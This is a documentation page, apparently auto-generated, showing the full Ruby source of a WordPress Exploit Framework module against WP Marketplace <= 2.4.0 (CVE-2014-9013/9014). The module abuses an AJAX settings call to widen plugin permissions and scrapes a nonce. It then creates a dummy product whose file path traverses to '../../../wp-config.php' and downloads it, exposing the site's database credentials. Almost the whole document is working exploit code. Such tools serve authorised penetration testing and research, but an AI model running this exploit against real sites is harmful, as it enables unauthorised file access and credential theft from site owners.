class Wpxf::Auxiliary::WpMarketplaceV24FileDownload

Attributes

download_id[RW]

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'WP Marketplace <= 2.4.0 Arbitrary File Download',
    desc: %(
      This module exploits a vulnerability which allows registered users of any level
      to download any arbitrary file accessible by the user the web server is running as.
    ),
    author: [
      'Kacper Szurek', # Disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '7861'],
      ['CVE', '2014-9013'],
      ['CVE', '2014-9014'],
      ['URL', 'http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html']
    ],
    date: 'Mar 21 2015'
  )

  register_options([
    StringOption.new(
      name: 'user_role',
      desc: 'The role of the user account being used for authentication',
      default: 'Subscriber',
      required: true
    )
  ])
end

Public Instance Methods

before_download() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 116
def before_download
  return false unless modify_plugin_permissions
  emit_info 'Modified plugin permissions successfully', true

  @nonce = fetch_ajax_nonce
  return false unless @nonce

  emit_info "Acquired nonce \"#{@nonce}\"", true
  self.download_id = "1#{Utility::Text.rand_numeric(5)}"

  create_product
end
check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 38
def check
  check_plugin_version_from_changelog('wpmarketplace', 'readme.txt', '2.4.1')
end
create_product() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 94
def create_product
  res = execute_post_request(
    url: full_uri,
    body: {
      '__product_wpmp' => @nonce,
      'post_type' => 'wpmarketplace',
      'id' => @download_id,
      'wpmp_list[base_price]' => '0',
      'wpmp_list[file][]' => remote_file
    },
    cookie: session_cookie
  )

  unless res && (res.code == 200 || res.code == 302)
    emit_error 'Failed to create dummy product'
    emit_error res.inspect, true
    return false
  end

  true
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 46
def default_remote_file_path
  '../../../wp-config.php'
end
download_request_method() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 129
def download_request_method
  :post
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 137
def download_request_params
  { 'wpmpfile' => download_id }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 133
def downloader_url
  full_uri
end
fetch_ajax_nonce() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 73
def fetch_ajax_nonce
  res = execute_post_request(
    url: full_uri,
    body: {
      'action'  => 'wpmp_pp_ajax_call',
      'execute' => 'wpmp_front_add_product'
    },
    cookie: session_cookie
  )

  nonce = res.body[/name="__product_wpmp" value="([^"]+)"/i, 1] if res&.code == 200

  unless nonce
    emit_error 'Failed to acquire a download nonce'
    emit_error res.inspect, true
    return false
  end

  nonce
end
modify_plugin_permissions() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 54
def modify_plugin_permissions
  res = execute_post_request(
    url: full_uri,
    body: {
      'action'                      => 'wpmp_pp_ajax_call',
      'execute'                     => 'wpmp_save_settings',
      '_wpmp_settings[user_role][]' => datastore['user_role'].downcase
    },
    cookie: session_cookie
  )

  unless res && res.code == 200 && res.body =~ /Settings Saved Successfully/i
    emit_error 'Failed to modify the plugin permissions'
    return false
  end

  true
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 42
def requires_authentication
  true
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 50
def working_directory
  'wp-content/plugins/wpmarketplace'
end